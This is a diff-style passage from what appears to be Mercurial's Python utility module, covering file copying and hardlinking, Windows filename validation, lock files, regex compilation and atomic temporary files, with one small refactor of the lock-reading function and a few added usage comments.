1648 raise
1648 raise
1649
1649
1650 return check
1650 return check
1651
1651
1652 # a whitelist of known filesystems where hardlinking works reliably
1652 # a whitelist of known filesystems where hardlinking works reliably
1653 _hardlinkfswhitelist = {
1653 _hardlinkfswhitelist = {
1654 'apfs',
1654 'apfs',
1655 'btrfs',
1655 'btrfs',
1656 'ext2',
1656 'ext2',
1657 'ext3',
1657 'ext3',
1658 'ext4',
1658 'ext4',
1659 'hfs',
1659 'hfs',
1660 'jfs',
1660 'jfs',
1661 'NTFS',
1661 'NTFS',
1662 'reiserfs',
1662 'reiserfs',
1663 'tmpfs',
1663 'tmpfs',
1664 'ufs',
1664 'ufs',
1665 'xfs',
1665 'xfs',
1666 'zfs',
1666 'zfs',
1667 }
1667 }
1668
1668
1669 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1669 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1670 '''copy a file, preserving mode and optionally other stat info like
1670 '''copy a file, preserving mode and optionally other stat info like
1671 atime/mtime
1671 atime/mtime
1672
1672
1673 checkambig argument is used with filestat, and is useful only if
1673 checkambig argument is used with filestat, and is useful only if
1674 destination file is guarded by any lock (e.g. repo.lock or
1674 destination file is guarded by any lock (e.g. repo.lock or
1675 repo.wlock).
1675 repo.wlock).
1676
1676
1677 copystat and checkambig should be exclusive.
1677 copystat and checkambig should be exclusive.
1678 '''
1678 '''
1679 assert not (copystat and checkambig)
1679 assert not (copystat and checkambig)
1680 oldstat = None
1680 oldstat = None
1681 if os.path.lexists(dest):
1681 if os.path.lexists(dest):
1682 if checkambig:
1682 if checkambig:
1683 oldstat = checkambig and filestat.frompath(dest)
1683 oldstat = checkambig and filestat.frompath(dest)
1684 unlink(dest)
1684 unlink(dest)
1685 if hardlink:
1685 if hardlink:
1686 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1686 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1687 # unless we are confident that dest is on a whitelisted filesystem.
1687 # unless we are confident that dest is on a whitelisted filesystem.
1688 try:
1688 try:
1689 fstype = getfstype(os.path.dirname(dest))
1689 fstype = getfstype(os.path.dirname(dest))
1690 except OSError:
1690 except OSError:
1691 fstype = None
1691 fstype = None
1692 if fstype not in _hardlinkfswhitelist:
1692 if fstype not in _hardlinkfswhitelist:
1693 hardlink = False
1693 hardlink = False
1694 if hardlink:
1694 if hardlink:
1695 try:
1695 try:
1696 oslink(src, dest)
1696 oslink(src, dest)
1697 return
1697 return
1698 except (IOError, OSError):
1698 except (IOError, OSError):
1699 pass # fall back to normal copy
1699 pass # fall back to normal copy
1700 if os.path.islink(src):
1700 if os.path.islink(src):
1701 os.symlink(os.readlink(src), dest)
1701 os.symlink(os.readlink(src), dest)
1702 # copytime is ignored for symlinks, but in general copytime isn't needed
1702 # copytime is ignored for symlinks, but in general copytime isn't needed
1703 # for them anyway
1703 # for them anyway
1704 else:
1704 else:
1705 try:
1705 try:
1706 shutil.copyfile(src, dest)
1706 shutil.copyfile(src, dest)
1707 if copystat:
1707 if copystat:
1708 # copystat also copies mode
1708 # copystat also copies mode
1709 shutil.copystat(src, dest)
1709 shutil.copystat(src, dest)
1710 else:
1710 else:
1711 shutil.copymode(src, dest)
1711 shutil.copymode(src, dest)
1712 if oldstat and oldstat.stat:
1712 if oldstat and oldstat.stat:
1713 newstat = filestat.frompath(dest)
1713 newstat = filestat.frompath(dest)
1714 if newstat.isambig(oldstat):
1714 if newstat.isambig(oldstat):
1715 # stat of copied file is ambiguous to original one
1715 # stat of copied file is ambiguous to original one
1716 advanced = (
1716 advanced = (
1717 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1717 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1718 os.utime(dest, (advanced, advanced))
1718 os.utime(dest, (advanced, advanced))
1719 except shutil.Error as inst:
1719 except shutil.Error as inst:
1720 raise error.Abort(str(inst))
1720 raise error.Abort(str(inst))
1721
1721
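# Usage sketch (editor's addition, hypothetical paths): request a hardlink
# copy; copyfile silently degrades to a real copy when the destination
# filesystem is not in the hardlink whitelist or oslink() fails. Passing
# copystat=True instead would also carry over atime/mtime.
def _copyfileexample(src, dest):
    copyfile(src, dest, hardlink=True)  # hardlink if safe, else copy
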
1722 def copyfiles(src, dst, hardlink=None, progress=None):
1722 def copyfiles(src, dst, hardlink=None, progress=None):
1723 """Copy a directory tree using hardlinks if possible."""
1723 """Copy a directory tree using hardlinks if possible."""
1724 num = 0
1724 num = 0
1725
1725
1726 def settopic():
1726 def settopic():
1727 if progress:
1727 if progress:
1728 progress.topic = _('linking') if hardlink else _('copying')
1728 progress.topic = _('linking') if hardlink else _('copying')
1729
1729
1730 if os.path.isdir(src):
1730 if os.path.isdir(src):
1731 if hardlink is None:
1731 if hardlink is None:
1732 hardlink = (os.stat(src).st_dev ==
1732 hardlink = (os.stat(src).st_dev ==
1733 os.stat(os.path.dirname(dst)).st_dev)
1733 os.stat(os.path.dirname(dst)).st_dev)
1734 settopic()
1734 settopic()
1735 os.mkdir(dst)
1735 os.mkdir(dst)
1736 for name, kind in listdir(src):
1736 for name, kind in listdir(src):
1737 srcname = os.path.join(src, name)
1737 srcname = os.path.join(src, name)
1738 dstname = os.path.join(dst, name)
1738 dstname = os.path.join(dst, name)
1739 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1739 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1740 num += n
1740 num += n
1741 else:
1741 else:
1742 if hardlink is None:
1742 if hardlink is None:
1743 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1743 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1744 os.stat(os.path.dirname(dst)).st_dev)
1744 os.stat(os.path.dirname(dst)).st_dev)
1745 settopic()
1745 settopic()
1746
1746
1747 if hardlink:
1747 if hardlink:
1748 try:
1748 try:
1749 oslink(src, dst)
1749 oslink(src, dst)
1750 except (IOError, OSError):
1750 except (IOError, OSError):
1751 hardlink = False
1751 hardlink = False
1752 shutil.copy(src, dst)
1752 shutil.copy(src, dst)
1753 else:
1753 else:
1754 shutil.copy(src, dst)
1754 shutil.copy(src, dst)
1755 num += 1
1755 num += 1
1756 if progress:
1756 if progress:
1757 progress.increment()
1757 progress.increment()
1758
1758
1759 return hardlink, num
1759 return hardlink, num
1760
1760
1761 _winreservednames = {
1761 _winreservednames = {
1762 'con', 'prn', 'aux', 'nul',
1762 'con', 'prn', 'aux', 'nul',
1763 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1763 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1764 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1764 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1765 }
1765 }
1766 _winreservedchars = ':*?"<>|'
1766 _winreservedchars = ':*?"<>|'
1767 def checkwinfilename(path):
1767 def checkwinfilename(path):
1768 r'''Check that the base-relative path is a valid filename on Windows.
1768 r'''Check that the base-relative path is a valid filename on Windows.
1769 Returns None if the path is ok, or a UI string describing the problem.
1769 Returns None if the path is ok, or a UI string describing the problem.
1770
1770
1771 >>> checkwinfilename(b"just/a/normal/path")
1771 >>> checkwinfilename(b"just/a/normal/path")
1772 >>> checkwinfilename(b"foo/bar/con.xml")
1772 >>> checkwinfilename(b"foo/bar/con.xml")
1773 "filename contains 'con', which is reserved on Windows"
1773 "filename contains 'con', which is reserved on Windows"
1774 >>> checkwinfilename(b"foo/con.xml/bar")
1774 >>> checkwinfilename(b"foo/con.xml/bar")
1775 "filename contains 'con', which is reserved on Windows"
1775 "filename contains 'con', which is reserved on Windows"
1776 >>> checkwinfilename(b"foo/bar/xml.con")
1776 >>> checkwinfilename(b"foo/bar/xml.con")
1777 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1777 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1778 "filename contains 'AUX', which is reserved on Windows"
1778 "filename contains 'AUX', which is reserved on Windows"
1779 >>> checkwinfilename(b"foo/bar/bla:.txt")
1779 >>> checkwinfilename(b"foo/bar/bla:.txt")
1780 "filename contains ':', which is reserved on Windows"
1780 "filename contains ':', which is reserved on Windows"
1781 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1781 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1782 "filename contains '\\x07', which is invalid on Windows"
1782 "filename contains '\\x07', which is invalid on Windows"
1783 >>> checkwinfilename(b"foo/bar/bla ")
1783 >>> checkwinfilename(b"foo/bar/bla ")
1784 "filename ends with ' ', which is not allowed on Windows"
1784 "filename ends with ' ', which is not allowed on Windows"
1785 >>> checkwinfilename(b"../bar")
1785 >>> checkwinfilename(b"../bar")
1786 >>> checkwinfilename(b"foo\\")
1786 >>> checkwinfilename(b"foo\\")
1787 "filename ends with '\\', which is invalid on Windows"
1787 "filename ends with '\\', which is invalid on Windows"
1788 >>> checkwinfilename(b"foo\\/bar")
1788 >>> checkwinfilename(b"foo\\/bar")
1789 "directory name ends with '\\', which is invalid on Windows"
1789 "directory name ends with '\\', which is invalid on Windows"
1790 '''
1790 '''
1791 if path.endswith('\\'):
1791 if path.endswith('\\'):
1792 return _("filename ends with '\\', which is invalid on Windows")
1792 return _("filename ends with '\\', which is invalid on Windows")
1793 if '\\/' in path:
1793 if '\\/' in path:
1794 return _("directory name ends with '\\', which is invalid on Windows")
1794 return _("directory name ends with '\\', which is invalid on Windows")
1795 for n in path.replace('\\', '/').split('/'):
1795 for n in path.replace('\\', '/').split('/'):
1796 if not n:
1796 if not n:
1797 continue
1797 continue
1798 for c in _filenamebytestr(n):
1798 for c in _filenamebytestr(n):
1799 if c in _winreservedchars:
1799 if c in _winreservedchars:
1800 return _("filename contains '%s', which is reserved "
1800 return _("filename contains '%s', which is reserved "
1801 "on Windows") % c
1801 "on Windows") % c
1802 if ord(c) <= 31:
1802 if ord(c) <= 31:
1803 return _("filename contains '%s', which is invalid "
1803 return _("filename contains '%s', which is invalid "
1804 "on Windows") % stringutil.escapestr(c)
1804 "on Windows") % stringutil.escapestr(c)
1805 base = n.split('.')[0]
1805 base = n.split('.')[0]
1806 if base and base.lower() in _winreservednames:
1806 if base and base.lower() in _winreservednames:
1807 return _("filename contains '%s', which is reserved "
1807 return _("filename contains '%s', which is reserved "
1808 "on Windows") % base
1808 "on Windows") % base
1809 t = n[-1:]
1809 t = n[-1:]
1810 if t in '. ' and n not in '..':
1810 if t in '. ' and n not in '..':
1811 return _("filename ends with '%s', which is not allowed "
1811 return _("filename ends with '%s', which is not allowed "
1812 "on Windows") % t
1812 "on Windows") % t
1813
1813
1814 if pycompat.iswindows:
1814 if pycompat.iswindows:
1815 checkosfilename = checkwinfilename
1815 checkosfilename = checkwinfilename
1816 timer = time.clock
1816 timer = time.clock
1817 else:
1817 else:
1818 checkosfilename = platform.checkosfilename
1818 checkosfilename = platform.checkosfilename
1819 timer = time.time
1819 timer = time.time
1820
1820
1821 if safehasattr(time, "perf_counter"):
1821 if safehasattr(time, "perf_counter"):
1822 timer = time.perf_counter
1822 timer = time.perf_counter
1823
1823
1824 def makelock(info, pathname):
1824 def makelock(info, pathname):
1825 """Create a lock file atomically if possible
1825 """Create a lock file atomically if possible
1826
1826
1827 This may leave a stale lock file if symlink isn't supported and signal
1827 This may leave a stale lock file if symlink isn't supported and signal
1828 interrupt is enabled.
1828 interrupt is enabled.
1829 """
1829 """
1830 try:
1830 try:
1831 return os.symlink(info, pathname)
1831 return os.symlink(info, pathname)
1832 except OSError as why:
1832 except OSError as why:
1833 if why.errno == errno.EEXIST:
1833 if why.errno == errno.EEXIST:
1834 raise
1834 raise
1835 except AttributeError: # no symlink in os
1835 except AttributeError: # no symlink in os
1836 pass
1836 pass
1837
1837
1838 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1838 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1839 ld = os.open(pathname, flags)
1839 ld = os.open(pathname, flags)
1840 os.write(ld, info)
1840 os.write(ld, info)
1841 os.close(ld)
1841 os.close(ld)
1842
1842
1843 def readlock(pathname):
1843 def readlock(pathname):
1844 try:
1844 try:
1845 return readlink(pathname)
1845 return readlink(pathname)
1846 except OSError as why:
1846 except OSError as why:
1847 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1847 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1848 raise
1848 raise
1849 except AttributeError: # no symlink in os
1849 except AttributeError: # no symlink in os
1850 pass
1850 pass
1851 fp = posixfile(pathname, 'rb')
1851 with posixfile(pathname, 'rb') as fp:
1852 r = fp.read()
1852 return fp.read()
1853 fp.close()
1854 return r
1855
1853
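# Usage sketch (editor's addition): makelock/readlock round-trip with
# hypothetical lock info. Where os.symlink exists, the info travels in the
# link target; on the fallback path it is a regular file, which readlock
# now reads inside a context manager so the handle is closed even if
# read() raises.
def _lockexample(pathname):
    makelock('locked-by: example', pathname)
    return readlock(pathname)  # -> 'locked-by: example'
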
1856 def fstat(fp):
1854 def fstat(fp):
1857 '''stat file object that may not have fileno method.'''
1855 '''stat file object that may not have fileno method.'''
1858 try:
1856 try:
1859 return os.fstat(fp.fileno())
1857 return os.fstat(fp.fileno())
1860 except AttributeError:
1858 except AttributeError:
1861 return os.stat(fp.name)
1859 return os.stat(fp.name)
1862
1860
1863 # File system features
1861 # File system features
1864
1862
1865 def fscasesensitive(path):
1863 def fscasesensitive(path):
1866 """
1864 """
1867 Return true if the given path is on a case-sensitive filesystem
1865 Return true if the given path is on a case-sensitive filesystem
1868
1866
1869 Requires a path (like /foo/.hg) ending with a foldable final
1867 Requires a path (like /foo/.hg) ending with a foldable final
1870 directory component.
1868 directory component.
1871 """
1869 """
1872 s1 = os.lstat(path)
1870 s1 = os.lstat(path)
1873 d, b = os.path.split(path)
1871 d, b = os.path.split(path)
1874 b2 = b.upper()
1872 b2 = b.upper()
1875 if b == b2:
1873 if b == b2:
1876 b2 = b.lower()
1874 b2 = b.lower()
1877 if b == b2:
1875 if b == b2:
1878 return True # no evidence against case sensitivity
1876 return True # no evidence against case sensitivity
1879 p2 = os.path.join(d, b2)
1877 p2 = os.path.join(d, b2)
1880 try:
1878 try:
1881 s2 = os.lstat(p2)
1879 s2 = os.lstat(p2)
1882 if s2 == s1:
1880 if s2 == s1:
1883 return False
1881 return False
1884 return True
1882 return True
1885 except OSError:
1883 except OSError:
1886 return True
1884 return True
1887
1885
1888 try:
1886 try:
1889 import re2
1887 import re2
1890 _re2 = None
1888 _re2 = None
1891 except ImportError:
1889 except ImportError:
1892 _re2 = False
1890 _re2 = False
1893
1891
1894 class _re(object):
1892 class _re(object):
1895 def _checkre2(self):
1893 def _checkre2(self):
1896 global _re2
1894 global _re2
1897 try:
1895 try:
1898 # check if match works, see issue3964
1896 # check if match works, see issue3964
1899 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1897 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1900 except ImportError:
1898 except ImportError:
1901 _re2 = False
1899 _re2 = False
1902
1900
1903 def compile(self, pat, flags=0):
1901 def compile(self, pat, flags=0):
1904 '''Compile a regular expression, using re2 if possible
1902 '''Compile a regular expression, using re2 if possible
1905
1903
1906 For best performance, use only re2-compatible regexp features. The
1904 For best performance, use only re2-compatible regexp features. The
1907 only flags from the re module that are re2-compatible are
1905 only flags from the re module that are re2-compatible are
1908 IGNORECASE and MULTILINE.'''
1906 IGNORECASE and MULTILINE.'''
1909 if _re2 is None:
1907 if _re2 is None:
1910 self._checkre2()
1908 self._checkre2()
1911 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1909 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1912 if flags & remod.IGNORECASE:
1910 if flags & remod.IGNORECASE:
1913 pat = '(?i)' + pat
1911 pat = '(?i)' + pat
1914 if flags & remod.MULTILINE:
1912 if flags & remod.MULTILINE:
1915 pat = '(?m)' + pat
1913 pat = '(?m)' + pat
1916 try:
1914 try:
1917 return re2.compile(pat)
1915 return re2.compile(pat)
1918 except re2.error:
1916 except re2.error:
1919 pass
1917 pass
1920 return remod.compile(pat, flags)
1918 return remod.compile(pat, flags)
1921
1919
1922 @propertycache
1920 @propertycache
1923 def escape(self):
1921 def escape(self):
1924 '''Return the version of escape corresponding to self.compile.
1922 '''Return the version of escape corresponding to self.compile.
1925
1923
1926 This is imperfect because whether re2 or re is used for a particular
1924 This is imperfect because whether re2 or re is used for a particular
1927 function depends on the flags, etc, but it's the best we can do.
1925 function depends on the flags, etc, but it's the best we can do.
1928 '''
1926 '''
1929 global _re2
1927 global _re2
1930 if _re2 is None:
1928 if _re2 is None:
1931 self._checkre2()
1929 self._checkre2()
1932 if _re2:
1930 if _re2:
1933 return re2.escape
1931 return re2.escape
1934 else:
1932 else:
1935 return remod.escape
1933 return remod.escape
1936
1934
1937 re = _re()
1935 re = _re()
1938
1936
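# Usage sketch (editor's addition): util's re.compile transparently
# prefers the faster re2 engine when it is importable and the pattern
# only needs re2-compatible flags, falling back to the stdlib engine
# otherwise; callers never need to know which engine compiled the pattern.
def _recompileexample():
    pat = re.compile(br'^[a-z]+$', remod.IGNORECASE)  # re2 if available
    return bool(pat.match(b'Hello'))                  # True either way
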
1939 _fspathcache = {}
1937 _fspathcache = {}
1940 def fspath(name, root):
1938 def fspath(name, root):
1941 '''Get name in the case stored in the filesystem
1939 '''Get name in the case stored in the filesystem
1942
1940
1943 The name should be relative to root, and be normcase-ed for efficiency.
1941 The name should be relative to root, and be normcase-ed for efficiency.
1944
1942
1945 Note that this function is unnecessary, and should not be
1943 Note that this function is unnecessary, and should not be
1946 called, for case-sensitive filesystems (simply because it's expensive).
1944 called, for case-sensitive filesystems (simply because it's expensive).
1947
1945
1948 The root should be normcase-ed, too.
1946 The root should be normcase-ed, too.
1949 '''
1947 '''
1950 def _makefspathcacheentry(dir):
1948 def _makefspathcacheentry(dir):
1951 return dict((normcase(n), n) for n in os.listdir(dir))
1949 return dict((normcase(n), n) for n in os.listdir(dir))
1952
1950
1953 seps = pycompat.ossep
1951 seps = pycompat.ossep
1954 if pycompat.osaltsep:
1952 if pycompat.osaltsep:
1955 seps = seps + pycompat.osaltsep
1953 seps = seps + pycompat.osaltsep
1956 # Protect backslashes. This gets silly very quickly.
1954 # Protect backslashes. This gets silly very quickly.
1957 seps = seps.replace('\\', '\\\\')
1955 seps = seps.replace('\\', '\\\\')
1958 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1956 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1959 dir = os.path.normpath(root)
1957 dir = os.path.normpath(root)
1960 result = []
1958 result = []
1961 for part, sep in pattern.findall(name):
1959 for part, sep in pattern.findall(name):
1962 if sep:
1960 if sep:
1963 result.append(sep)
1961 result.append(sep)
1964 continue
1962 continue
1965
1963
1966 if dir not in _fspathcache:
1964 if dir not in _fspathcache:
1967 _fspathcache[dir] = _makefspathcacheentry(dir)
1965 _fspathcache[dir] = _makefspathcacheentry(dir)
1968 contents = _fspathcache[dir]
1966 contents = _fspathcache[dir]
1969
1967
1970 found = contents.get(part)
1968 found = contents.get(part)
1971 if not found:
1969 if not found:
1972 # retry "once per directory" per "dirstate.walk" which
1970 # retry "once per directory" per "dirstate.walk" which
1973 # may take place for each patch of "hg qpush", for example
1971 # may take place for each patch of "hg qpush", for example
1974 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1972 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1975 found = contents.get(part)
1973 found = contents.get(part)
1976
1974
1977 result.append(found or part)
1975 result.append(found or part)
1978 dir = os.path.join(dir, part)
1976 dir = os.path.join(dir, part)
1979
1977
1980 return ''.join(result)
1978 return ''.join(result)
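
# Example for fspath() above (illustrative sketch, not part of the original
# module): on a case-insensitive filesystem the on-disk spelling may differ
# from what the caller has. Both arguments are assumed to be normcase-ed;
# the path and names here are hypothetical:
#
#   # suppose the directory really contains 'README.TXT'
#   fspath('readme.txt', '/repo')   # -> 'README.TXT'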

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
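
# Note for checknlink() above (illustrative, not part of the original
# module): the probe creates a scratch file next to testfile, hardlinks it,
# and checks that the observed link count is > 1, e.g.:
#
#   if checknlink(os.path.join(storedir, 'probe')):   # hypothetical path
#       # hardlink counts are trustworthy here
#       pass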

def endswithsep(path):
    '''Check whether path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """help to exactly detect change of a file

    The 'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists. Otherwise, it is None. This can avoid a preparative
    'exists()' examination on the client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        the same time in seconds (= S[n-1].ctime), and comparison of
        timestamps is ambiguous.

        The basic idea to avoid such ambiguity is "advance mtime 1 sec,
        if the timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because the naturally advanced S[n].mtime in case (*1)
        might be equal to a manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        a change masked by such an mtime collision.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of the file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be the previous filestat of 'path'.

        This skips avoiding ambiguity if the process doesn't have
        appropriate privileges for 'path'. It returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on a file created by another user causes EPERM,
                # if the process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
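
# Worked example for filestat above (illustrative, not part of the original
# module): code guarding a cache file against the ambiguity described in
# isambig() typically does something like the following; 'path' is
# hypothetical:
#
#   oldstat = filestat.frompath(path)
#   # ... rewrite path in place ...
#   newstat = filestat.frompath(path)
#   if newstat.isambig(oldstat):
#       # both changes landed in the same ctime second; push mtime forward
#       newstat.avoidambig(path, oldstat)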

class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat, and
    is useful only if the target file is guarded by a lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()
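
# Usage sketch for atomictempfile above (illustrative, not part of the
# original module): __enter__/__exit__ make it a context manager, so a clean
# exit renames the temporary copy over the target while an exception discards
# it. 'somefile' is a hypothetical path:
#
#   with atomictempfile('somefile', 'wb') as fp:
#       fp.write(b'new content')
#   # on success, 'somefile' now has the new content; on error it is untouched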

def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If the size parameter l is omitted, read everything."""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
